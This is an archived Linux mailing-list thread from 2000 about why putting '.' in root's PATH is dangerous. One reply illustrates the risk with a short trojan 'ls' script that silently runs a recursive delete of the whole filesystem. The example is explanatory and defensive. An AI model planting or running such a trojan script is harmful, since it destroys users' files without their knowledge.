I would think that with all the known problems with running rm -rf from
root that someone would get smart and find a way to disable its use from
root. rm -r from root would accomplish the same but force the user to sit
there and manually approve each deletion.
Granted there are times when as a sys adm I use rm -rf, especially in
deleting a user's file system when said individual is no longer active on
the system. But this is rare enough for me that disabling rm -rf from
root would be worth the extra work I'd have to do later.
Glen
On Mon, 31 Jul 2000, Jake McHenry wrote:
>
>ok, thanks for the info. I never really thought of it like that, someone else
>running as root. Even though they would never get my password, I guess there are
>other ways of becoming root. Thanks again.
>
>jake
>
>
>On Mon, 31 Jul 2000, Charles Galpin wrote:
>
>--I didn't see anyone answer this, so I'll give it a stab.
>--
>--It protects you against trojans. The beauty of the unix security model is
>--that a 'regular' user can't do much wrong to the system, only to
>--themselves. However if you can get root to run something malicious (like
>--"rm -rf /") then you can really cause some damage.
>--
>--If root has "." in their path, then programs in the current directory may
>--be found and run. If it's at the end of the path then the risk is much
>--less, but still there.
>--
>-- *** DO NOT TRY THIS **
>--A trivial example of a trojan would be creating a file called 'ls' in /tmp
>--with the following contents
>--
>--#!/bin/sh
>--rm -rf / >& /dev/null&
>--/bin/ls
>--
>--If this were made executable and someone with "." in their path before
>--/bin ran this, you might have a lot of files missing before you realize
>--it (since it does indeed do a ls as well). If it were root, then you would
>--lose all your files..
>--
>--I hope this has been a clear enough description to scare the hell out of
>--you and remove "." from your regular accounts as well. Sadly enough you
>--won't (like me) and probably have rm aliased to 'rm -f' even though it's
>--bitten you in the ass several times already. Hey, that's what backups are
>--for right? Of course I am nowhere near that casual with my root acounts.
>--
>--charles
>--
>--On Fri, 28 Jul 2000, Steve Arnold wrote:
>--
>--> Jake McHenry wrote:
>-->
>--> > What is such a security error with what I said? I've never done what I said, but
>--> > about the same thing. I have root's login disabled, to I have to su to root. I
>--> > have the . at the end of my user's path, and when I su to root, it keeps my
>--> > paths, including the ., so I always can run the program in the current
>--> > directory. I only su to root when I need to, don't use it for everything, hence
>--> > why I did it this way. I've always done this. Can someone please explain to me
>--> > why it is such a security problem? And sorry to the person that I told this to,
>--> > if I realized this was a mistake, I wouldn't have told him to do that.
>-->
>--> I'd like to hear a good answer on this one, too. Although I do the
>--> "./blah" thing for messing around with stuff in the current directory,
>--> I'm not sure what the big deal is. Is it just the possibility of
>--> running something un-intended as root that's the big danger here?
>-->
>--> Don't leave us dangling...
>-->
>--> Steve
>-->
>-->
>-->
>--> --
>--> To unsubscribe: mail [EMAIL PROTECTED] with "unsubscribe"
>--> as the Subject.
>-->
>--
>--
>----
>--To unsubscribe: mail [EMAIL PROTECTED] with "unsubscribe"
>--as the Subject.
>--
>--
>
>Jake McHenry
>[EMAIL PROTECTED]
>
>
>
--
To unsubscribe: mail [EMAIL PROTECTED] with "unsubscribe"
as the Subject.
